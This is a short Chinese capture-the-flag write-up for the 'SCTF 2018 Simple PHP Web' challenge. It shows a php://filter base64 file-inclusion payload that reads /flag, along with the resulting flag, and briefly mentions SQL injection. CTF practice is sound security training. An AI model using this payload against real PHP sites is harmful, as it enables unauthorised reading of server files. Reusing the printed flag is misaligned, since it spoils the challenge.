bmzctf刷题 SCTF 2018_Simple PHP Web
bmzctf刷题 SCTF 2018_Simple PHP Web
正常解法
一眼就可以看出/f=login.php
直接文件读取
失败
尝试伪协议读取
payload
?f=php://filter/read=convert.base64-encode/resource=/flag
base64解码后
BMZCTF{fb169f79d7e64512bb272aad5dab2b1a}
OVER
其他的尝试
看到这两个框框。。。
sql注入
好吧,不用试了
<script> alert(/login error!/)</script>
A lion doesn't concern himself with the opinions of a sheep.
浙公网安备 33010602011771号